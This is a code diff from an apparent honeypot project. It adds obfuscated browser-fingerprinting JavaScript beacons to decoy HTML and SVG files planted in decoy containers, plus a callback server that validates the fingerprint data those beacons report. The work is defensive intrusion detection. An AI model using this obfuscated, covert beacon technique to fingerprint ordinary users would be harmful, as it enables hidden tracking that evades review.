raise FingerprintSecretMissing(
|
||||||
|
f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
|
||||||
|
)
|
||||||
|
msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
|
||||||
|
return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
|
||||||
|
|
||||||
|
|
||||||
|
def _seed_from_token(callback_token: str) -> int:
|
||||||
|
"""Derive a 31-bit numeric seed from the callback token.
|
||||||
|
|
||||||
|
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
|
||||||
|
using a SHA-256-derived prefix gives us a uniform distribution
|
||||||
|
across the 31-bit positive range.
|
||||||
|
"""
|
||||||
|
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
|
||||||
|
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
|
||||||
|
|
||||||
|
|
||||||
|
def _config_from_seed(seed: int) -> dict[str, Any]:
|
||||||
|
"""Build a deterministic, per-mint obfuscator config.
|
||||||
|
|
||||||
|
The hash bits drive *which* transforms apply — two mints get
|
||||||
|
structurally different outputs, not just different identifier names.
|
||||||
|
Defaults stay aggressive enough that reverse engineering is real
|
||||||
|
work; we never disable string-array or rename, only vary the dial.
|
||||||
|
"""
|
||||||
|
bits = seed
|
||||||
|
encodings = ("base64", "rc4")
|
||||||
|
string_array_encoding = [encodings[bits & 1]]
|
||||||
|
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
|
||||||
|
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
|
||||||
|
transform_object_keys = bool((bits >> 17) & 1)
|
||||||
|
numbers_to_expressions = bool((bits >> 18) & 1)
|
||||||
|
simplify = bool((bits >> 19) & 1)
|
||||||
|
return {
|
||||||
|
"compact": True,
|
||||||
|
"seed": seed,
|
||||||
|
"controlFlowFlattening": True,
|
||||||
|
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
|
||||||
|
"deadCodeInjection": True,
|
||||||
|
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
|
||||||
|
"stringArray": True,
|
||||||
|
"stringArrayEncoding": string_array_encoding,
|
||||||
|
"stringArrayThreshold": 1,
|
||||||
|
"stringArrayRotate": True,
|
||||||
|
"stringArrayShuffle": True,
|
||||||
|
"splitStrings": True,
|
||||||
|
"splitStringsChunkLength": 4 + (bits & 7),
|
||||||
|
"transformObjectKeys": transform_object_keys,
|
||||||
|
"numbersToExpressions": numbers_to_expressions,
|
||||||
|
"simplify": simplify,
|
||||||
|
"selfDefending": False, # breaks SVG embed; not worth the cost
|
||||||
|
"renameGlobals": False,
|
||||||
|
"identifierNamesGenerator": "mangled-shuffled",
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def obfuscate(code: str, *, callback_token: str) -> str:
|
||||||
|
"""Obfuscate *code* deterministically per *callback_token*.
|
||||||
|
|
||||||
|
Raises :class:`ObfuscatorError` if Node fails or returns empty.
|
||||||
|
"""
|
||||||
|
seed = _seed_from_token(callback_token)
|
||||||
|
options = _config_from_seed(seed)
|
||||||
|
payload = json.dumps({"code": code, "options": options})
|
||||||
|
try:
|
||||||
|
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
|
||||||
|
[_NODE_BIN, str(_HELPER)],
|
||||||
|
input=payload, capture_output=True, text=True,
|
||||||
|
timeout=_TIMEOUT_S, check=False,
|
||||||
|
)
|
||||||
|
except FileNotFoundError as e:
|
||||||
|
raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
|
||||||
|
except subprocess.TimeoutExpired as e:
|
||||||
|
raise ObfuscatorError("javascript-obfuscator timed out") from e
|
||||||
|
if proc.returncode != 0:
|
||||||
|
raise ObfuscatorError(
|
||||||
|
f"javascript-obfuscator failed rc={proc.returncode} "
|
||||||
|
f"stderr={proc.stderr.strip()[:400]}"
|
||||||
|
)
|
||||||
|
out = proc.stdout
|
||||||
|
if not out.strip():
|
||||||
|
raise ObfuscatorError("javascript-obfuscator returned empty output")
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def render_fingerprint_js(
|
||||||
|
*, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
|
||||||
|
) -> str:
|
||||||
|
"""Build the obfuscated fingerprint JS for a single mint.
|
||||||
|
|
||||||
|
Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
|
||||||
|
``{{MINT_NONCE}}`` in the payload template, then runs it through
|
||||||
|
:func:`obfuscate` with a seed derived from the callback token.
|
||||||
|
The nonce is appended as ``&k=`` on every beacon URL the JS emits;
|
||||||
|
the worker rejects fingerprint payloads whose ``?k=`` doesn't match
|
||||||
|
the row's :attr:`CanaryToken.fingerprint_nonce`.
|
||||||
|
"""
|
||||||
|
template = _PAYLOAD.read_text(encoding="utf-8")
|
||||||
|
beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
|
||||||
|
src = (
|
||||||
|
template
|
||||||
|
.replace("{{BEACON_URL}}", beacon)
|
||||||
|
.replace("{{MINT_UUID}}", mint_uuid)
|
||||||
|
.replace("{{MINT_NONCE}}", nonce)
|
||||||
|
)
|
||||||
|
return obfuscate(src, callback_token=callback_token)
|
||||||
10
decnet/canary/package.json
Normal file
10
decnet/canary/package.json
Normal file
@@ -0,0 +1,10 @@
|
|||||||
|
{
|
||||||
|
"name": "decnet-canary-obfuscator",
|
||||||
|
"version": "0.1.0",
|
||||||
|
"private": true,
|
||||||
|
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
|
||||||
|
"main": "_obfuscate_helper.js",
|
||||||
|
"dependencies": {
|
||||||
|
"javascript-obfuscator": "^5.4.2"
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||||
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
|
||||||
import base64
|
|
||||||
import os
|
import os
|
||||||
import shlex
|
from datetime import datetime, timedelta, timezone
|
||||||
import time
|
|
||||||
from secrets import token_urlsafe
|
from secrets import token_urlsafe
|
||||||
from typing import Any, Iterable, Optional
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
|
|||||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||||
from decnet.canary.factory import get_generator
|
from decnet.canary.factory import get_generator
|
||||||
from decnet.canary.paths import default_path_for
|
from decnet.canary.paths import default_path_for
|
||||||
|
from decnet.decky_io import (
|
||||||
|
delete_file_from_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.web.db.repository import BaseRepository
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
log = get_logger("canary.planter")
|
log = get_logger("canary.planter")
|
||||||
|
|
||||||
_DOCKER = "docker"
|
|
||||||
_TIMEOUT = 8.0
|
|
||||||
# Container suffix — matches the orchestrator SSH driver's convention
|
# Container suffix — matches the orchestrator SSH driver's convention
|
||||||
# (``<decky_name>-ssh``). Canary placement always happens through the
|
# (``<decky_name>-ssh``). Canary placement always happens through the
|
||||||
# ssh container because every decky has one and it carries the most
|
# ssh container because every decky has one and it carries the most
|
||||||
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
|
|||||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
# resolve_topology_container is re-exported from decky_io for back-compat
|
||||||
idx = path.rfind("/")
|
# with callers (tests, deploy hook) that imported it from this module
|
||||||
if idx <= 0:
|
# before the decky_io extraction.
|
||||||
return "/"
|
__all__ = [
|
||||||
return path[:idx]
|
"plant",
|
||||||
|
"revoke",
|
||||||
|
"resolve_topology_container",
|
||||||
async def _run(
|
"seed_baseline",
|
||||||
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
|
"seed_baseline_topology",
|
||||||
) -> tuple[int, str, str]:
|
]
|
||||||
try:
|
|
||||||
proc = await asyncio.create_subprocess_exec(
|
|
||||||
*argv,
|
|
||||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
|
||||||
stdout=asyncio.subprocess.PIPE,
|
|
||||||
stderr=asyncio.subprocess.PIPE,
|
|
||||||
)
|
|
||||||
except FileNotFoundError as exc:
|
|
||||||
return 127, "", f"argv[0] not found: {exc}"
|
|
||||||
try:
|
|
||||||
stdout, stderr = await asyncio.wait_for(
|
|
||||||
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
|
|
||||||
)
|
|
||||||
except asyncio.TimeoutError:
|
|
||||||
try:
|
|
||||||
proc.kill()
|
|
||||||
except ProcessLookupError:
|
|
||||||
pass
|
|
||||||
return 124, "", "timeout"
|
|
||||||
return (
|
|
||||||
proc.returncode if proc.returncode is not None else -1,
|
|
||||||
stdout.decode("utf-8", "replace"),
|
|
||||||
stderr.decode("utf-8", "replace"),
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
|
|
||||||
"""Compose the ``sh -c`` script + stdin payload for one artifact.
|
|
||||||
|
|
||||||
Binary safety: we base64-encode on the host and stream the result
|
|
||||||
over stdin to ``base64 -d`` inside the container, so the bytes
|
|
||||||
never touch the argv (kernel ARG_MAX would reject anything larger
|
|
||||||
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
|
|
||||||
and ``touch -d @<unix_ts>`` are present on every Linux base image
|
|
||||||
we ship, so there's no per-distro branching.
|
|
||||||
"""
|
|
||||||
encoded = base64.b64encode(artifact.content)
|
|
||||||
mtime = int(time.time() + artifact.mtime_offset)
|
|
||||||
mode_str = oct(artifact.mode)[2:]
|
|
||||||
parts = [
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
|
|
||||||
f"base64 -d > {shlex.quote(artifact.path)}",
|
|
||||||
f"chmod {mode_str} {shlex.quote(artifact.path)}",
|
|
||||||
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
|
|
||||||
]
|
|
||||||
return " && ".join(parts), encoded
|
|
||||||
|
|
||||||
|
|
||||||
async def _publish(
|
async def _publish(
|
||||||
@@ -139,6 +93,7 @@ async def plant(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Write *artifact* into the decky's ssh container.
|
"""Write *artifact* into the decky's ssh container.
|
||||||
|
|
||||||
@@ -157,13 +112,12 @@ async def plant(
|
|||||||
await repo.update_canary_token_state(token_uuid, "failed", err)
|
await repo.update_canary_token_state(token_uuid, "failed", err)
|
||||||
return False, err
|
return False, err
|
||||||
|
|
||||||
sh_cmd, stdin_payload = _build_plant_command(artifact)
|
target_container = container or _container_for(decky_name)
|
||||||
# ``-i`` keeps stdin attached so base64 -d inside the container can
|
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
|
||||||
# consume the encoded payload streamed from the host.
|
success, error = await write_file_to_container(
|
||||||
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
|
target_container, artifact.path, artifact.content,
|
||||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
|
mode=artifact.mode, mtime=mtime,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
if success:
|
if success:
|
||||||
@@ -182,8 +136,8 @@ async def plant(
|
|||||||
|
|
||||||
if not success:
|
if not success:
|
||||||
log.warning(
|
log.warning(
|
||||||
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
|
"canary.plant failed decky=%s token=%s container=%s err=%r",
|
||||||
decky_name, token_uuid, rc, stderr[:120],
|
decky_name, token_uuid, target_container, error,
|
||||||
)
|
)
|
||||||
return success, error
|
return success, error
|
||||||
|
|
||||||
@@ -196,6 +150,7 @@ async def revoke(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Best-effort unlink + state transition + bus publish.
|
"""Best-effort unlink + state transition + bus publish.
|
||||||
|
|
||||||
@@ -203,11 +158,10 @@ async def revoke(
|
|||||||
the file is gone after the call (whether we deleted it or it was
|
the file is gone after the call (whether we deleted it or it was
|
||||||
already missing); only docker / container-down errors return False.
|
already missing); only docker / container-down errors return False.
|
||||||
"""
|
"""
|
||||||
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
|
target_container = container or _container_for(decky_name)
|
||||||
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
|
success, error = await delete_file_from_container(
|
||||||
rc, _stdout, stderr = await _run(argv)
|
target_container, placement_path,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
||||||
@@ -250,6 +204,7 @@ async def seed_baseline(
|
|||||||
persona: str = "linux",
|
persona: str = "linux",
|
||||||
created_by: str = "system",
|
created_by: str = "system",
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> list[dict[str, Any]]:
|
) -> list[dict[str, Any]]:
|
||||||
"""Plant the configured baseline canary set on one decky.
|
"""Plant the configured baseline canary set on one decky.
|
||||||
|
|
||||||
@@ -293,9 +248,59 @@ async def seed_baseline(
|
|||||||
await plant(
|
await plant(
|
||||||
decky_name, artifact,
|
decky_name, artifact,
|
||||||
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
||||||
|
container=container,
|
||||||
)
|
)
|
||||||
out.append({
|
out.append({
|
||||||
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
||||||
"callback_token": slug, "placement_path": artifact.path,
|
"callback_token": slug, "placement_path": artifact.path,
|
||||||
})
|
})
|
||||||
return out
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
async def seed_baseline_topology(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
*,
|
||||||
|
created_by: str = "system",
|
||||||
|
bus: Optional[BaseBus] = None,
|
||||||
|
) -> list[dict[str, Any]]:
|
||||||
|
"""Plant baseline canaries on every decky in a MazeNET topology.
|
||||||
|
|
||||||
|
Mirrors :func:`seed_baseline` for the topology path. Container name
|
||||||
|
resolution uses :func:`resolve_topology_container` since topology
|
||||||
|
deckies may not have an ssh service — in that case we target the
|
||||||
|
base container instead.
|
||||||
|
|
||||||
|
Best-effort: failures on any single decky are logged inside
|
||||||
|
:func:`plant`; the deploy hook treats the return value as
|
||||||
|
informational. Returns a flat list of per-token dicts (with an added
|
||||||
|
``decky_name`` key) across all deckies.
|
||||||
|
"""
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
log.warning(
|
||||||
|
"canary.seed_baseline_topology: topology %s not found", topology_id,
|
||||||
|
)
|
||||||
|
return []
|
||||||
|
|
||||||
|
out: list[dict[str, Any]] = []
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
decky_name = cfg.get("name") or decky.get("name")
|
||||||
|
if not decky_name:
|
||||||
|
continue
|
||||||
|
services = decky.get("services") or []
|
||||||
|
container = resolve_topology_container(topology_id, decky_name, services)
|
||||||
|
# MazeNET deckies don't carry an OS persona today; default to
|
||||||
|
# linux (every base image we ship is Linux).
|
||||||
|
rows = await seed_baseline(
|
||||||
|
decky_name, repo,
|
||||||
|
persona="linux", created_by=created_by, bus=bus,
|
||||||
|
container=container,
|
||||||
|
)
|
||||||
|
for r in rows:
|
||||||
|
r["decky_name"] = decky_name
|
||||||
|
out.append(r)
|
||||||
|
return out
|
||||||
|
|||||||
@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import binascii
|
||||||
|
import json
|
||||||
import os
|
import os
|
||||||
|
import time
|
||||||
|
import uuid
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
from fastapi import FastAPI, Request, Response
|
from fastapi import FastAPI, Request, Response
|
||||||
|
|
||||||
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Namespace used by fingerprint generators to derive mint UUID.
|
||||||
|
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
|
||||||
|
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
|
||||||
|
# Not shared across worker restarts or processes — acceptable for MVP.
|
||||||
|
_FP_RATE_WINDOW_S = 60
|
||||||
|
_FP_RATE_LIMIT = 30
|
||||||
|
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
|
||||||
|
|
||||||
|
|
||||||
|
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
|
||||||
|
key = (token_uuid, src_ip)
|
||||||
|
now = time.monotonic()
|
||||||
|
cutoff = now - _FP_RATE_WINDOW_S
|
||||||
|
bucket = _fp_rate_buckets.get(key, [])
|
||||||
|
bucket = [t for t in bucket if t > cutoff]
|
||||||
|
if len(bucket) >= _FP_RATE_LIMIT:
|
||||||
|
_fp_rate_buckets[key] = bucket
|
||||||
|
return False
|
||||||
|
bucket.append(now)
|
||||||
|
_fp_rate_buckets[key] = bucket
|
||||||
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
def _is_valid_fp_shape(fp: dict) -> bool:
|
||||||
|
"""Layer B — structural sanity check on a decoded fingerprint blob."""
|
||||||
|
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
|
||||||
|
return False
|
||||||
|
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
|
||||||
|
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
|
||||||
|
return present >= 3
|
||||||
|
|
||||||
|
|
||||||
def _http_base() -> str:
|
def _http_base() -> str:
|
||||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||||
|
|
||||||
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
|
|
||||||
@app.get("/c/{slug}")
|
@app.get("/c/{slug}")
|
||||||
async def callback(slug: str, request: Request) -> Response:
|
async def callback(slug: str, request: Request) -> Response:
|
||||||
|
raw_nonce = request.query_params.get("k")
|
||||||
|
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
|
||||||
|
merged_headers = dict(request.headers)
|
||||||
|
if fp_meta:
|
||||||
|
merged_headers.update(fp_meta)
|
||||||
await _record_hit(
|
await _record_hit(
|
||||||
repo, bus,
|
repo, bus,
|
||||||
slug=slug,
|
slug=slug,
|
||||||
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
user_agent=request.headers.get("user-agent"),
|
user_agent=request.headers.get("user-agent"),
|
||||||
request_path=str(request.url.path),
|
request_path=str(request.url.path),
|
||||||
dns_qname=None,
|
dns_qname=None,
|
||||||
raw_headers=dict(request.headers),
|
raw_headers=merged_headers,
|
||||||
|
parsed_fp=parsed_fp,
|
||||||
|
raw_nonce=raw_nonce,
|
||||||
)
|
)
|
||||||
# Always 200 with a tiny image so the attacker's client sees
|
# Always 200 with a tiny image so the attacker's client sees
|
||||||
# a "success" — same return regardless of whether the slug is
|
# a "success" — same return regardless of whether the slug is
|
||||||
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
return app
|
return app
|
||||||
|
|
||||||
|
|
||||||
|
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
|
||||||
|
# overflow is handled via chunking (s/i/n + d). Anything larger than
|
||||||
|
# this on a single request is junk, so we drop it instead of letting an
|
||||||
|
# attacker inflate a trigger row indefinitely.
|
||||||
|
_FP_CHUNK_MAX = 8 * 1024
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
|
||||||
|
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
|
||||||
|
|
||||||
|
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
|
||||||
|
|
||||||
|
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
|
||||||
|
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
|
||||||
|
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
|
||||||
|
|
||||||
|
Returns a tuple of:
|
||||||
|
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
|
||||||
|
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
|
||||||
|
when there's no ``?d=`` or decoding fails.
|
||||||
|
"""
|
||||||
|
out: dict[str, Any] = {}
|
||||||
|
parsed_fp: Optional[dict] = None
|
||||||
|
if not qp:
|
||||||
|
return out, parsed_fp
|
||||||
|
o = qp.get("o") if hasattr(qp, "get") else None
|
||||||
|
if o:
|
||||||
|
out["_fp_open"] = "1"
|
||||||
|
d = qp.get("d") if hasattr(qp, "get") else None
|
||||||
|
if not d:
|
||||||
|
return out, parsed_fp
|
||||||
|
if len(d) > _FP_CHUNK_MAX:
|
||||||
|
out["_fp_oversize"] = "1"
|
||||||
|
return out, parsed_fp
|
||||||
|
|
||||||
|
sid = qp.get("s")
|
||||||
|
idx = qp.get("i")
|
||||||
|
total = qp.get("n")
|
||||||
|
if sid and idx and total:
|
||||||
|
out["_fp_sid"] = sid
|
||||||
|
out["_fp_idx"] = idx
|
||||||
|
out["_fp_total"] = total
|
||||||
|
out["_fp_chunk"] = d
|
||||||
|
return out, parsed_fp
|
||||||
|
|
||||||
|
# Single-shot: decode and pass back as parsed_fp; validation runs in
|
||||||
|
# _record_hit after token lookup so we have the stored nonce at hand.
|
||||||
|
try:
|
||||||
|
padded = d + "=" * (-len(d) % 4)
|
||||||
|
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
|
||||||
|
parsed = json.loads(raw.decode("utf-8"))
|
||||||
|
except (binascii.Error, ValueError, UnicodeDecodeError):
|
||||||
|
out["_fp_decode_error"] = "1"
|
||||||
|
return out, parsed_fp
|
||||||
|
if isinstance(parsed, dict):
|
||||||
|
parsed_fp = parsed
|
||||||
|
else:
|
||||||
|
out["_fp_decode_error"] = "1"
|
||||||
|
return out, parsed_fp
|
||||||
|
|
||||||
|
|
||||||
def _client_ip(request: Request) -> str:
|
def _client_ip(request: Request) -> str:
|
||||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||||
# proxy. Take the leftmost address in the chain; everything after
|
# proxy. Take the leftmost address in the chain; everything after
|
||||||
@@ -154,16 +262,58 @@ async def _record_hit(
|
|||||||
request_path: Optional[str],
|
request_path: Optional[str],
|
||||||
dns_qname: Optional[str],
|
dns_qname: Optional[str],
|
||||||
raw_headers: Optional[dict],
|
raw_headers: Optional[dict],
|
||||||
|
parsed_fp: Optional[dict] = None,
|
||||||
|
raw_nonce: Optional[str] = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
||||||
|
|
||||||
Unknown slugs are silently swallowed: returning the same response
|
Unknown slugs are silently swallowed: returning the same response
|
||||||
for known and unknown slugs is the stealth posture, and persisting
|
for known and unknown slugs is the stealth posture, and persisting
|
||||||
every random scan would clutter the DB.
|
every random scan would clutter the DB.
|
||||||
|
|
||||||
|
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
|
||||||
|
it is validated through four layers before being merged into raw_headers:
|
||||||
|
A) nonce match against CanaryToken.fingerprint_nonce,
|
||||||
|
B) structural shape check,
|
||||||
|
C) mint UUID consistency,
|
||||||
|
D) per-(token, IP) rate limit.
|
||||||
|
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
|
||||||
|
The trigger row always lands regardless — the GET hit is itself forensic.
|
||||||
"""
|
"""
|
||||||
token = await repo.get_canary_token_by_slug(slug)
|
token = await repo.get_canary_token_by_slug(slug)
|
||||||
if token is None:
|
if token is None:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
final_headers: dict[str, Any] = dict(raw_headers or {})
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
|
||||||
|
|
||||||
|
# Layer A — nonce
|
||||||
|
if stored_nonce is not None and raw_nonce != stored_nonce:
|
||||||
|
final_headers["_fp_invalid_nonce"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer B — shape (only when nonce passed or no nonce enforced)
|
||||||
|
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
|
||||||
|
final_headers["_fp_invalid_shape"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer C — mint UUID consistency
|
||||||
|
if parsed_fp is not None:
|
||||||
|
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
|
||||||
|
if parsed_fp.get("mint") != expected_mint:
|
||||||
|
final_headers["_fp_invalid_mint"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer D — rate limit
|
||||||
|
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
|
||||||
|
final_headers["_fp_rate_limited"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
final_headers["_fp"] = parsed_fp
|
||||||
|
|
||||||
trigger_id = await repo.record_canary_trigger({
|
trigger_id = await repo.record_canary_trigger({
|
||||||
"token_uuid": token["uuid"],
|
"token_uuid": token["uuid"],
|
||||||
"occurred_at": datetime.now(timezone.utc),
|
"occurred_at": datetime.now(timezone.utc),
|
||||||
@@ -171,7 +321,7 @@ async def _record_hit(
|
|||||||
"user_agent": user_agent,
|
"user_agent": user_agent,
|
||||||
"request_path": request_path,
|
"request_path": request_path,
|
||||||
"dns_qname": dns_qname,
|
"dns_qname": dns_qname,
|
||||||
"raw_headers": raw_headers or {},
|
"raw_headers": final_headers,
|
||||||
})
|
})
|
||||||
try:
|
try:
|
||||||
await bus.publish(
|
await bus.publish(
|
